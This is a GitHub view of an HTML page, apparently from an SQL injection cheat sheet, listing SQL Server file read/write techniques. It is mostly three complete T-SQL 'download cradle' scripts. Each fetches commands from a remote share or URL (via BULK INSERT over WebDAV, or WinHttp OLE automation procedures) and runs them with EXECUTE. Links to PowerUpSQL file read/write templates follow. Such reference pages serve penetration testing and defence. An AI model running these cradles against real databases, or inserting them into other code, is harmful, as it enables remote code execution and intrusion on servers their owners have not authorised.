-
Notifications
You must be signed in to change notification settings - Fork 148
Expand file tree
/
Copy pathsqlserver.html
More file actions
138 lines (135 loc) · 6.19 KB
/
sqlserver.html
File metadata and controls
138 lines (135 loc) · 6.19 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
<h3 id="reading-and-writing-files">Reading and Writing Files</h3>
<p class="pageDescription">{{site.data.injectionDescriptions.readingAndWritingFiles}}</p>
<p>* Requires privileged user</p>
<table class="table table-striped table-hover">
<thead>
<tr>
<th>Description</th>
<th>Query</th>
</tr>
</thead>
<tbody>
<tr>
<td>Download Cradle bulk in server - TSQL</td>
<td>-- Bulk Insert - Download Cradle Example<br/>
<br/>
-- Setup variables<br/>
Declare @cmd varchar(8000)<br/>
<br/>
-- Create temp table<br/>
CREATE TABLE #file (content nvarchar(4000));<br/>
<br/>
-- Read file into temp table - web server must support propfind<br/>
BULK INSERT #file FROM '\\sharepoint.acme.com@SSL\Path\to\file.txt';<br/>
<br/>
-- Select contents of file<br/>
SELECT @cmd = content FROM #file<br/>
<br/>
-- Display command<br/>
SELECT @cmd<br/>
<br/>
-- Run command<br/>
EXECUTE(@cmd)<br/>
<br/>
-- Drop the temp table<br/>
DROP TABLE #file</td>
</tr>
<tr>
<td>Download Cradle OAP 1 - TSQL</td>
<td>-- OLE Automation Procedure - Download Cradle Example<br/>
-- Does not require a table, but can't handle larger payloads<br/>
<br/>
-- Note: This also works with unc paths \\ip\file.txt<br/>
-- Note: This also works with webdav paths \\ip@80\file.txt However, the target web server needs to support propfind.<br/>
<br/>
-- Setup Variables<br/>
DECLARE @url varchar(300)<br/>
DECLARE @WinHTTP int<br/>
DECLARE @handle int<br/>
DECLARE @Command varchar(8000)<br/>
<br/>
-- Set target url containting TSQL<br/>
SET @url = 'http://127.0.0.1/mycmd.txt'<br/>
<br/>
-- Setup namespace<br/>
EXEC @handle=sp_OACreate 'WinHttp.WinHttpRequest.5.1',@WinHTTP OUT<br/>
<br/>
-- Call the Open method to setup the HTTP request<br/>
EXEC @handle=sp_OAMethod @WinHTTP, 'Open',NULL,'GET',@url,'false'<br/>
<br/>
-- Call the Send method to send the HTTP GET request<br/>
EXEC @handle=sp_OAMethod @WinHTTP,'Send'<br/>
<br/>
-- Capture the HTTP response content<br/>
EXEC @handle=sp_OAGetProperty @WinHTTP,'ResponseText', @Command out<br/>
<br/>
-- Destroy the object<br/>
EXEC @handle=sp_OADestroy @WinHTTP<br/>
<br/>
-- Display command<br/>
SELECT @Command<br/>
<br/>
-- Run command<br/>
EXECUTE (@Command)</td>
</tr>
<tr>
<td>Download Cradle OAP 2 - TSQL</td>
<td>-- OLE Automation Procedure - Download Cradle Example - Option 2<br/>
-- Can handle larger payloads, but requires a table<br/>
<br/>
-- Note: This also works with unc paths \\ip\file.txt<br/>
-- Note: This also works with webdav paths \\ip@80\file.txt However, the target web server needs to support propfind.<br/>
<br/>
-- Setup Variables<br/>
DECLARE @url varchar(300)<br/>
DECLARE @WinHTTP int<br/>
DECLARE @Handle int<br/>
DECLARE @Command varchar(8000)<br/>
<br/>
-- Set target url containting TSQL<br/>
SET @url = 'http://127.0.0.1/mycmd.txt'<br/>
<br/>
-- Create temp table to store downloaded string<br/>
CREATE TABLE #text(html text NULL)<br/>
<br/>
-- Setup namespace<br/>
EXEC @Handle=sp_OACreate 'WinHttp.WinHttpRequest.5.1',@WinHTTP OUT<br/>
<br/>
-- Call open method to configure HTTP request<br/>
EXEC @Handle=sp_OAMethod @WinHTTP, 'Open',NULL,'GET',@url,'false'<br/>
<br/>
-- Call Send method to send the HTTP request<br/>
EXEC @Handle=sp_OAMethod @WinHTTP,'Send'<br/>
<br/>
-- Capture the HTTP response content<br/>
INSERT #text(html)<br/>
EXEC @Handle=sp_OAGetProperty @WinHTTP,'ResponseText'<br/>
<br/>
-- Destroy the object<br/>
EXEC @Handle=sp_OADestroy @WinHTTP<br/>
<br/>
-- Display the commad<br/>
SELECT @Command = html from #text<br/>
SELECT @Command<br/>
<br/>
-- Run the command<br/>
EXECUTE (@Command)<br/>
<br/>
-- Remove temp table<br/>
DROP TABLE #text</td>
</tr>
<tr>
<td>Reading Files - TSQL</td>
<td><a target="_blank" rel="noopener" href="https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenDataSourceTxt.sql">https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenDataSourceTxt.sql</a><br/>
<a target="_blank" rel="noopener" href="https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_BulkInsert.sql">https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_BulkInsert.sql</a><br/>
<a target="_blank" rel="noopener" href="https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenDataSourceXlsx">https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenDataSourceXlsx</a><br/>
<a target="_blank" rel="noopener" href="https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetBulk.sql">https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetBulk.sql</a><br/>
<a target="_blank" rel="noopener" href="https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetTxt.sql">https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetTxt.sql</a><br/>
<a target="_blank" rel="noopener" href="https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetXlsx.sql">https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetXlsx.sql</a></td>
</tr>
<tr>
<td>Writing Files - TSQL</td>
<td><a target="_blank" rel="noopener" href="https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/writefile_bulkinsert.sql">https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/writefile_bulkinsert.sql</a><br/>
<a target="_blank" rel="noopener" href="https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/writefile_OpenRowSetTxt.sql">https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/writefile_OpenRowSetTxt.sql</a></td>
</tbody>
</table>